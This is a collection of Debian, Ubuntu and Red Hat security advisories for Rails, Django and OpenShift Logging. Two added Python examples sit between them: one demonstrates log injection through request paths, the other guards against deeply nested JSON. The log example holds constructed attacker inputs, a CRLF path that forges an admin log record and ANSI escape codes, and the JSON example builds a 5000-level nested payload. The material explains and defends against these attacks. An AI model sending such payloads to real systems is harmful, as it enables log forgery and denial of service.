Debian LTS Advisory DLA-4416-1 (Rails)

Multiple security issues were discovered in the Rails web framework which could result in command injection or in unescaped ANSI escape sequences being written to logs.

For Debian 11 bullseye, these problems have been fixed in version 2:6.0.3.7+dfsg-2+deb11u4.
Django could be made to perform log injection if it received specially crafted input.

==========================================================================
Ubuntu Security Notice USN-7555-2
June 16, 2025

python-django vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 25.04
- Ubuntu 24.10
- Ubuntu 24.04 LTS
- Ubuntu 22.04 LTS

Summary:

Django could be made to perform log injection if it received specially crafted input.

Software Description:
- python-django: High-level Python web development framework

Details:

USN-7555-1 fixed vulnerabilities in Django. The fix was incomplete. This update applies an additional patch to fix it properly.

Original advisory details:

It was discovered that Django incorrectly handled certain unescaped request paths. An attacker could possibly use this issue to perform a log injection.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 25.04
  python3-django  3:4.2.18-1ubuntu1.3

Ubuntu 24.10
  python3-django  3:4.2.15-1ubuntu1.6

Ubuntu 24.04 LTS
  python3-django  3:4.2.11-1ubuntu1.9

Ubuntu 22.04 LTS
  python3-django  2:3.2.12-2ubuntu1.20

In general, a standard system update will make all the necessary changes.

References:
  https://ubuntu.com/security/notices/USN-7555-2
  https://ubuntu.com/security/notices/USN-7555-1
  https://bugs.launchpad.net/ubuntu/+source/python-django/+bug/2113924

Package Information:
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.18-1ubuntu1.3
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.15-1ubuntu1.6
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.9
  https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.20

Severity: Important.
LinuxSecurity.com Team
Django could be made to perform log injection if it received specially crafted input.

==========================================================================
Ubuntu Security Notice USN-7555-1
June 04, 2025

python-django vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 25.04
- Ubuntu 24.10
- Ubuntu 24.04 LTS
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS

Summary:

Django could be made to perform log injection if it received specially crafted input.

Software Description:
- python-django: High-level Python web development framework

Details:

It was discovered that Django incorrectly handled certain unescaped request paths. An attacker could possibly use this issue to perform a log injection.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 25.04
  python3-django  3:4.2.18-1ubuntu1.2

Ubuntu 24.10
  python3-django  3:4.2.15-1ubuntu1.5

Ubuntu 24.04 LTS
  python3-django  3:4.2.11-1ubuntu1.8

Ubuntu 22.04 LTS
  python3-django  2:3.2.12-2ubuntu1.19

Ubuntu 20.04 LTS
  python3-django  2:2.2.12-1ubuntu0.29+esm1  (Available with Ubuntu Pro)

In general, a standard system update will make all the necessary changes.

References:
  https://ubuntu.com/security/notices/USN-7555-1
  CVE-2025-48432

Package Information:
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.18-1ubuntu1.2
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.15-1ubuntu1.5
  https://launchpad.net/ubuntu/+source/python-django/3:4.2.11-1ubuntu1.8
  https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.19

Severity: Important.
LinuxSecurity.com Team
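Both the Rails item in DLA-4416-1 ("logging of unescaped ANSI sequences") and the Django issue in USN-7555-1 (an unescaped request path reaching the log) are the same defect: a string the client controls is written to a log record verbatim, so a carriage return or line feed lets the client end the record and forge the next one, and an ESC byte lets it plant terminal escape sequences that fire when someone tails the file. The following added example (not Django, Rails or distribution code; the access-log format, the sanitiser and both attacker paths are constructed for illustration) shows the vulnerable and the hardened logging side by side.

```python
"""Log injection through an unescaped request path, the defect class behind
USN-7555-1 (Django) and the 'unescaped ANSI sequences' item in DLA-4416-1
(Rails). Added example, not Django, Rails or distribution code: the access
log format, the sanitiser and the two attacker paths are constructed here."""
import io
import logging
import re

# C0 controls, DEL and C1 controls. \r and \n let a request end the current
# log record and start a forged one; \x1b starts ANSI escape sequences that a
# terminal or log viewer will honour when the file is displayed.
_CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f]")


def escape_for_log(value: str) -> str:
    """Replace every control character with a visible escape (\\r, \\n, \\t or
    \\xNN), so a record always stays on one line and carries no terminal codes."""
    named = {"\r": "\\r", "\n": "\\n", "\t": "\\t"}
    return _CONTROL.sub(
        lambda m: named.get(m.group(0), "\\x%02x" % ord(m.group(0))), value
    )


def _logger(stream: io.StringIO, name: str) -> logging.Logger:
    """A logger whose only handler writes 'LEVEL message' lines to stream."""
    log = logging.getLogger(name)
    log.handlers.clear()
    log.propagate = False
    log.setLevel(logging.INFO)
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    log.addHandler(handler)
    return log


def render_response_log(method: str, path: str, status: int, escape: bool) -> str:
    """Log one HTTP response the way a framework's response logger might, then
    return exactly what reached the log. escape=False is the vulnerable form
    (path written verbatim); escape=True is the hardened form."""
    buf = io.StringIO()
    log = _logger(buf, "example.safe" if escape else "example.vuln")
    shown = escape_for_log(path) if escape else path
    log.warning("%s %s -> %d", method, shown, status)
    return buf.getvalue()


def record_count(log_text: str) -> int:
    """Number of lines a log reader would see; a forged record shows up as 2."""
    return len(log_text.splitlines())


# Constructed attacker inputs (each would be sent as the URL path of a request).
FORGED_PATH = "/login\r\nINFO GET /admin -> 200"   # CRLF, then a fake record
ANSI_PATH = "/\x1b[2J\x1b[31mALERT"                # clear screen, red text

if __name__ == "__main__":
    for escape in (False, True):
        print(repr(render_response_log("GET", FORGED_PATH, 404, escape)))
        print(repr(render_response_log("GET", ANSI_PATH, 404, escape)))
```

With `escape=False` the forged path yields two records, the second of which looks like a genuine successful request for `/admin`; with `escape=True` it stays one record and the `\r\n` is visible as text. Escaping at the logging boundary is the right place for the check because it protects every call site at once; URL percent-decoding happens earlier, so a path that arrived as `%0d%0a` is already a raw CRLF by the time it is logged.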
Red Hat Security Advisory RHSA-2022:8889-01: Openshift Logging Bug Fix Release (5.3.14). Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis:     Moderate: Openshift Logging 5.3.14 bug fix release and security update
Advisory ID:  RHSA-2022:8889-01
Product:      Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2022:8889
Issue date:   2022-12-08
CVE Names:    CVE-2016-3709 CVE-2020-35525 CVE-2020-35527 CVE-2020-36516 CVE-2020-36518 CVE-2020-36558 CVE-2021-3640 CVE-2021-30002 CVE-2022-0168 CVE-2022-0561 CVE-2022-0562 CVE-2022-0617 CVE-2022-0854 CVE-2022-0865 CVE-2022-0891 CVE-2022-0908 CVE-2022-0909 CVE-2022-0924 CVE-2022-1016 CVE-2022-1048 CVE-2022-1055 CVE-2022-1184 CVE-2022-1292 CVE-2022-1304 CVE-2022-1355 CVE-2022-1586 CVE-2022-1785 CVE-2022-1852 CVE-2022-1897 CVE-2022-1927 CVE-2022-2068 CVE-2022-2078 CVE-2022-2097 CVE-2022-2509 CVE-2022-2586 CVE-2022-2639 CVE-2022-2938 CVE-2022-3515 CVE-2022-20368 CVE-2022-21499 CVE-2022-21618 CVE-2022-21619 CVE-2022-21624 CVE-2022-21626 CVE-2022-21628 CVE-2022-22624 CVE-2022-22628 CVE-2022-22629 CVE-2022-22662 CVE-2022-22844 CVE-2022-23960 CVE-2022-24448 CVE-2022-25255 CVE-2022-26373 CVE-2022-26700 CVE-2022-26709 CVE-2022-26710 CVE-2022-26716 CVE-2022-26717 CVE-2022-26719 CVE-2022-27404 CVE-2022-27405 CVE-2022-27406 CVE-2022-27950 CVE-2022-28390 CVE-2022-28893 CVE-2022-29581 CVE-2022-30293 CVE-2022-34903 CVE-2022-36946 CVE-2022-37434 CVE-2022-39399 CVE-2022-42003 CVE-2022-42004 CVE-2022-42898
====================================================================

1. Summary:

Openshift Logging Bug Fix Release (5.3.14)

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.3.14)

Security Fix(es):

* jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518)
* jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)
* jackson-databind: use of deeply nested arrays (CVE-2022-42004)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly, for detailed release notes:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.9/html/logging/release-notes

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.9/html/logging/cluster-logging-upgrading

4. Bugs fixed (https://bugzilla.redhat.com/):

2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays
5. JIRA issues fixed:

LOG-3293 - log-file-metric-exporter container has no limits, exhausting the resources of the node

6. References:

https://access.redhat.com/security/cve/CVE-2016-3709 https://access.redhat.com/security/cve/CVE-2020-35525 https://access.redhat.com/security/cve/CVE-2020-35527 https://access.redhat.com/security/cve/CVE-2020-36516 https://access.redhat.com/security/cve/CVE-2020-36518 https://access.redhat.com/security/cve/CVE-2020-36558 https://access.redhat.com/security/cve/CVE-2021-3640 https://access.redhat.com/security/cve/CVE-2021-30002 https://access.redhat.com/security/cve/CVE-2022-0168 https://access.redhat.com/security/cve/CVE-2022-0561 https://access.redhat.com/security/cve/CVE-2022-0562 https://access.redhat.com/security/cve/CVE-2022-0617 https://access.redhat.com/security/cve/CVE-2022-0854 https://access.redhat.com/security/cve/CVE-2022-0865 https://access.redhat.com/security/cve/CVE-2022-0891 https://access.redhat.com/security/cve/CVE-2022-0908 https://access.redhat.com/security/cve/CVE-2022-0909 https://access.redhat.com/security/cve/CVE-2022-0924 https://access.redhat.com/security/cve/CVE-2022-1016 https://access.redhat.com/security/cve/CVE-2022-1048 https://access.redhat.com/security/cve/CVE-2022-1055 https://access.redhat.com/security/cve/CVE-2022-1184 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1304 https://access.redhat.com/security/cve/CVE-2022-1355 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1785 https://access.redhat.com/security/cve/CVE-2022-1852 https://access.redhat.com/security/cve/CVE-2022-1897 https://access.redhat.com/security/cve/CVE-2022-1927 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2078 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-2509 https://access.redhat.com/security/cve/CVE-2022-2586
https://access.redhat.com/security/cve/CVE-2022-2639 https://access.redhat.com/security/cve/CVE-2022-2938 https://access.redhat.com/security/cve/CVE-2022-3515 https://access.redhat.com/security/cve/CVE-2022-20368 https://access.redhat.com/security/cve/CVE-2022-21499 https://access.redhat.com/security/cve/CVE-2022-21618 https://access.redhat.com/security/cve/CVE-2022-21619 https://access.redhat.com/security/cve/CVE-2022-21624 https://access.redhat.com/security/cve/CVE-2022-21626 https://access.redhat.com/security/cve/CVE-2022-21628 https://access.redhat.com/security/cve/CVE-2022-22624 https://access.redhat.com/security/cve/CVE-2022-22628 https://access.redhat.com/security/cve/CVE-2022-22629 https://access.redhat.com/security/cve/CVE-2022-22662 https://access.redhat.com/security/cve/CVE-2022-22844 https://access.redhat.com/security/cve/CVE-2022-23960 https://access.redhat.com/security/cve/CVE-2022-24448 https://access.redhat.com/security/cve/CVE-2022-25255 https://access.redhat.com/security/cve/CVE-2022-26373 https://access.redhat.com/security/cve/CVE-2022-26700 https://access.redhat.com/security/cve/CVE-2022-26709 https://access.redhat.com/security/cve/CVE-2022-26710 https://access.redhat.com/security/cve/CVE-2022-26716 https://access.redhat.com/security/cve/CVE-2022-26717 https://access.redhat.com/security/cve/CVE-2022-26719 https://access.redhat.com/security/cve/CVE-2022-27404 https://access.redhat.com/security/cve/CVE-2022-27405 https://access.redhat.com/security/cve/CVE-2022-27406 https://access.redhat.com/security/cve/CVE-2022-27950 https://access.redhat.com/security/cve/CVE-2022-28390 https://access.redhat.com/security/cve/CVE-2022-28893 https://access.redhat.com/security/cve/CVE-2022-29581 https://access.redhat.com/security/cve/CVE-2022-30293 https://access.redhat.com/security/cve/CVE-2022-34903 https://access.redhat.com/security/cve/CVE-2022-36946 https://access.redhat.com/security/cve/CVE-2022-37434 https://access.redhat.com/security/cve/CVE-2022-39399 
https://access.redhat.com/security/cve/CVE-2022-42003 https://access.redhat.com/security/cve/CVE-2022-42004 https://access.redhat.com/security/cve/CVE-2022-42898 https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBY5Jma9zjgjWX9erEAQh83xAAj1mTs7t69xXYjstib3b10ZSQFlaK8ZHu U1CEqRryyTwdLZJUBNnXcFV7S+tGPIthAzg3RCn0Tun45Kj/v296A2AF8DoKPRmu LZUUi6c5K0vFLTG2zbO0Gxy0rOcxwHmq9QLsQii3AylhXH9BOlJC+VeeaLdJXmd3 7Zwg2Y2opzSYPph1yc/9yf24ln6thgSmFU7lsY60EiPN9GGPXTFKnTbWDNrfRCvy LJTOYISYm8miRC3TsQ/Nt31an3uSE5e6x4aVEXM12TvZTRL4GCcxbBWK3VSScbg8 T7C98yEWNEwouXMNoQr9MGxPwgmUZ8WsgmzYMWOdKABPk5wcQPqC9pfLtamI+AOM TZQUy3TfdTxo79Tkhd5QVOnM0WD/3VWtv/OXTcObhacyifzk3kdr5W8D9PqwMp67 4OiyX+bZlZAXKkLuD2IAeNsqP6wafFGPw79IGRSd5ggNRFIj9gJECxxHc+tvQR7F m6zIWSkjacYUfI8KEI8729qGxwGhqPHHcBS2nAm5pnxXt/3/07BkagQl+5cYW8rS 3rTwx93v6U6F1e7H3FzpucrVDNHK406j3qhKBKHHDr12IPL8Q47dJuTFK9LxhKD8 dGEbNbW23wEkGFjh9BKnac10mPx7uBhQBVmfIrpkgBQhUA6lY7+elso2pVt/FLYw ouxkTmp3LIQ=PYNA -----END PGP SIGNATURE-----

-- RHSA-announce mailing list
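All three jackson-databind fixes in RHSA-2022:8889 are the same defect class: a parser that recurses once per nesting level can be driven to exhaustion by a small document consisting of nothing but opening brackets. The remedy is to bound nesting depth before, or while, parsing. The following added example in Python (not Jackson or Red Hat code; the depth limit of 100 is an assumption chosen for illustration) scans the raw text in one pass and rejects over-nested input before the real parser ever sees it, which is the cheapest place to enforce the bound because the scan is linear and stops at the first offending character.

```python
"""Bounding JSON nesting depth before parsing, the defect class behind the three
jackson-databind CVEs in RHSA-2022:8889 (CVE-2020-36518, CVE-2022-42003,
CVE-2022-42004). Added example in Python, not Jackson or Red Hat code; the
default depth limit of 100 is an assumption chosen for illustration."""
import json
from typing import Any, Optional


class NestingTooDeep(ValueError):
    """Raised when the input nests arrays/objects deeper than the caller allows."""


def max_nesting_depth(text: str, limit: Optional[int] = None) -> int:
    """Single pass over the raw text counting [ and { nesting.

    Brackets inside string literals (and escaped quotes within them) are
    ignored. With a limit, the scan stops and raises at the first character
    that exceeds it, so a large hostile payload is never read to the end."""
    depth = deepest = 0
    in_string = escaped = False
    for ch in text:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            if depth > deepest:
                deepest = depth
                if limit is not None and deepest > limit:
                    raise NestingTooDeep(f"nesting depth exceeds {limit}")
        elif ch in "]}":
            depth -= 1  # unbalanced input is left for json.loads to reject
    return deepest


def safe_loads(text: str, max_depth: int = 100) -> Any:
    """json.loads guarded by the depth check. Without the guard a deeply nested
    document costs the parser a stack frame per level, the denial of service
    the advisory describes; with it the rejection is linear-time and explicit."""
    max_nesting_depth(text, limit=max_depth)
    return json.loads(text)


if __name__ == "__main__":
    # Constructed hostile input: 5000 nested arrays in 10 000 bytes.
    hostile = "[" * 5000 + "]" * 5000
    try:
        safe_loads(hostile, max_depth=1000)
    except NestingTooDeep as exc:
        print("rejected:", exc)
```

Pick the limit from what the application actually needs (most APIs never exceed a few dozen levels) rather than from what the parser can survive, and apply it to every deserialisation entry point, including wrapped single-value arrays, which is the path CVE-2022-42003 concerns.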
Red Hat Security Advisory RHSA-2022:5909-01: Openshift Logging Bug Fix Release (5.2.13). Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis:     Moderate: Openshift Logging Bug Fix and security update Release (5.2.13)
Advisory ID:  RHSA-2022:5909-01
Product:      Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2022:5909
Issue date:   2022-08-04
CVE Names:    CVE-2021-38561 CVE-2021-40528 CVE-2022-1271 CVE-2022-1621 CVE-2022-1629 CVE-2022-21540 CVE-2022-21541 CVE-2022-22576 CVE-2022-25313 CVE-2022-25314 CVE-2022-27774 CVE-2022-27776 CVE-2022-27782 CVE-2022-29824 CVE-2022-34169
====================================================================

1. Summary:

Openshift Logging Bug Fix Release (5.2.13)

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.2.13)

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly, for detailed release notes:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.8/html/logging/release-notes

For Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.8/html/logging/cluster-logging-upgrading

4. Bugs fixed (https://bugzilla.redhat.com/):

2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. References:

https://access.redhat.com/security/cve/CVE-2021-38561
https://access.redhat.com/security/cve/CVE-2021-40528
https://access.redhat.com/security/cve/CVE-2022-1271
https://access.redhat.com/security/cve/CVE-2022-1621
https://access.redhat.com/security/cve/CVE-2022-1629
https://access.redhat.com/security/cve/CVE-2022-21540
https://access.redhat.com/security/cve/CVE-2022-21541
https://access.redhat.com/security/cve/CVE-2022-22576
https://access.redhat.com/security/cve/CVE-2022-25313
https://access.redhat.com/security/cve/CVE-2022-25314
https://access.redhat.com/security/cve/CVE-2022-27774
https://access.redhat.com/security/cve/CVE-2022-27776
https://access.redhat.com/security/cve/CVE-2022-27782
https://access.redhat.com/security/cve/CVE-2022-29824
https://access.redhat.com/security/cve/CVE-2022-34169
https://access.redhat.com/security/updates/classification#moderate

6. Contact:

The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact

Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE----- Version: GnuPGv1 iQIVAwUBYuwKbdzjgjWX9erEAQge4Q/5AdmLXbzcYNVlB4a3k8ZYk+851l46Xy/G A/jatHrT93JzqaMDPUFMuxVJ+wdVoTrYJVCyNFKQe9bvfmkjZV+ppY0LMnt9BZKF 6GrgIT/tr0EQeF+KTYSjbfVVd/zCC6OEuA0P3ENYQoxVlKOqBUKLP0ag/LgU+OwB QFIdiUUoxYkum6/xc6qfflAowRAY5ZpxNW4z2MkzabaIPJbN316yA+rnM/kt5G4G tx6utcuO83jok1678sDL3XL3j2xM6L2rFwuVRg+kzJObCxjjPOnM2O3Id4le2LkB YgJw8EnjWXqtFwJNJnTDOBKjQrv7yD9GQVCb5QzzrERIwMiD/UUQ7NOpAESy/+zv s3hcdE5atZtZOip//P9LkvIk9tGhMiqkhR9WF1iX8pnnCTGxeyyfzKv67lV89NEC 7LUpuV9tdlGEwnJo7IzwC6d+XHTIc6DFZ7IDv3+YF0olND5PIHlnoQPz3kRStYIJ zoRMzXjBihSEgjqEVdw1bcJyXTGM80fgdsTTm4hGr+MXGT4JgrNAcYasd3AMT25I xaH7Y6XDdDY3k7g/pQVFckVWsrzn9a4QlPJaPAmFHBS4tq6TxC23AEAoVv4J2abg xvyZu27oVZSwie36Y1Pm1VioABBiL9md3zGUCQVHVnSPUwgOu7XUrW56VUEDEs36 Pndy5EfKK9c=quG0 -----END PGP SIGNATURE----- -- RHSA-announce mailing list
Red Hat Security Advisory RHSA-2022:2217-01: Openshift Logging Bug Fix Release (5.3.7). Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis:     Moderate: Red Hat OpenShift Logging Security and Bug update Release 5.3.7
Advisory ID:  RHSA-2022:2217-01
Product:      Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2022:2217
Issue date:   2022-05-11
CVE Names:    CVE-2018-25032 CVE-2021-4028 CVE-2021-37136 CVE-2021-37137 CVE-2021-43797 CVE-2022-0759 CVE-2022-0778 CVE-2022-1154 CVE-2022-1271 CVE-2022-21426 CVE-2022-21434 CVE-2022-21443 CVE-2022-21476 CVE-2022-21496 CVE-2022-21698 CVE-2022-25636
====================================================================

1. Summary:

Openshift Logging Bug Fix Release (5.3.7)

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.3.7)

Security Fix(es):

* kubeclient: kubeconfig parsing error can lead to MITM attacks (CVE-2022-0759)
* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)
* netty: control chars in header names may lead to HTTP request smuggling (CVE-2021-43797)
* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.10 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.10/html/release_notes/ocp-4-10-release-notes

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/logging/cluster-logging-upgrading

4. Bugs fixed (https://bugzilla.redhat.com/):

2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling
2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter
2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks
5. JIRA issues fixed (https://issues.redhat.com/):

LOG-2334 - [release-5.3] Events listing out of order in Kibana 6.8.1
LOG-2450 - http.max_header_size set to 128kb causes communication with elasticsearch to stop working
LOG-2481 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.3]

6. References:

https://access.redhat.com/security/cve/CVE-2018-25032
https://access.redhat.com/security/cve/CVE-2021-4028
https://access.redhat.com/security/cve/CVE-2021-37136
https://access.redhat.com/security/cve/CVE-2021-37137
https://access.redhat.com/security/cve/CVE-2021-43797
https://access.redhat.com/security/cve/CVE-2022-0759
https://access.redhat.com/security/cve/CVE-2022-0778
https://access.redhat.com/security/cve/CVE-2022-1154
https://access.redhat.com/security/cve/CVE-2022-1271
https://access.redhat.com/security/cve/CVE-2022-21426
https://access.redhat.com/security/cve/CVE-2022-21434
https://access.redhat.com/security/cve/CVE-2022-21443
https://access.redhat.com/security/cve/CVE-2022-21476
https://access.redhat.com/security/cve/CVE-2022-21496
https://access.redhat.com/security/cve/CVE-2022-21698
https://access.redhat.com/security/cve/CVE-2022-25636
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYnw2U9zjgjWX9erEAQi7Sw/+L7yfu+C6un45ah5GgF3MXRTXRLaBr3WU zDESM/2JnBZFHeJAjhyr71CxiSUc/ISjU40PZU4RC1VfsDk0yIZGVbcU5kexCkJj yfM95bUnzJiyCjHE3Xdq8TDQOUGVM+TDYqaGeGcATHTgSPj8WqWHgvV9KlotY5FL lhsb2TDn3h/rHbV7FpQ3mTJT7yrxPXGLFQN69n6IXIiSDOKedo3DBKBYROt2+BEW TkPnTZMWGyIkpnD0J8naJm5DtbJIvMOqQR9WW6GW4ISMAdVroI0423IeEy/JKyA/ 25dZrJ/bFbh0riqlCQSH0/Ud45g73ebqidYNGValKrmRMH9/EAblVKGKjR84G8XF /PGix26s9TMS7Iqv9IaJckc+b6ODZMDH8In/p3G+R4FQm1OqhHkOziXNhcbcIilm 2UYX5difbNRwbwzRkPJvAfg1BvtlobvuPj7UwjPcD4pBXKBjazqQCuwm2GB8Tehh dVp6ERe/Iuo32ETq+8/dBb2D9EEJdX33r9XX8si+q0g5+nHhFc473jP+uvwEBDpB 0B9bcknB6mgn4FyGMA5ujuFJ+31SEZf9LniEc6lQ8+DY5C38/ptBncDEp376HAFs WH4I6Z0xub7Uc2Jn1GmRuoUpQf+MRjn6ZFUImOQaROAYKPDrAWnirmLaAor9QwU0 PYI0DDsEFj0=48O2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list
Red Hat Security Advisory RHSA-2022:0225-01: an update is now available for OpenShift Logging (5.0.12). Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis:     Moderate: Red Hat OpenShift Enterprise Logging bug fix and security update (5.0.12)
Advisory ID:  RHSA-2022:0225-01
Product:      Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2022:0225
Issue date:   2022-01-20
CVE Names:    CVE-2021-44832
====================================================================

1. Summary:

An update is now available for OpenShift Logging (5.0.12)

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.0.12)

Security Fix(es):

* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)

3. Solution:

For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/release_notes/ocp-4-7-release-notes

For Red Hat OpenShift Logging 5.0, see the following instructions to apply this update:

https://docs.redhat.com/en/documentation/openshift_container_platform/4.7/html/logging/cluster-logging-upgrading

4. Bugs fixed (https://bugzilla.redhat.com/):

2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender

5. JIRA issues fixed (https://redhat.atlassian.net/jira/projects):

LOG-2089 - resourceVersion is overflowing type Integer causing ES rejection [openshift-logging 5.0]

6. References:

https://access.redhat.com/security/cve/CVE-2021-44832
https://access.redhat.com/security/updates/classification#moderate

7. Contact:

The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact

Copyright 2022 Red Hat, Inc.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYentwdzjgjWX9erEAQhzog//R394a37p9ejz9RI9AOvIgt57nFA4Sxd3 zNsSkz3qfHOpEXKtEJQvUashKNNxGmR5wYS6UjJIfX+cFwdC64MYjzIqppALWs3d VoWdaCc3MIY9kWwKjeSKEEGK0h2Zvu3ne+MANeJTfg5QiBuQWUx0hg6EsD9LbBCw kIiimqjJ5PEpDd7xf7SsKZ5r1lDTRG4XZfbTcyLZ6Emc2FRi0nnAfzOiUgMqml+w Gu6+M6OOli/CX8l3uIyVCkIDAaAP0YQHySbXLOEaGxvmcKw4uM6JTdXi0r6aLBPl uGToYYYUpN567db9/Vf3LmoJ1zVDVyuhgY+4nQYM7xtEP5f/5QM7oRCZo9LrlIuE k+Fh3biBtu6hJYOABRIS8O08F/acTh+w/angZXEQL5bnU3nNv9XhZ8XwtX7sD0ih BfH+70kEne/DVRlAze7edBX1aMiQJwj4NZ5rgkn+R1H7sxMfxcnbzRW+3/5ASeqX pUgMX1NwbHxxrldfAVbt+0FiLHXuC+4uZULUinhSEMA3f/2/EIRm3I/8u4kZtSKM any0U+TYwkuvxCnuKJm3OexXg39BtZmt6V9n+y5WjxoG9VyymQxuVDjV5l1htdah HwbcU+uN3aPAjHxjPuLGVx1R7mHGVhfd0qbDM8nJso6qiAX31R/ZTxXbD30yDdpe Z/Yz8ilsQmg=fr1l -----END PGP SIGNATURE-----
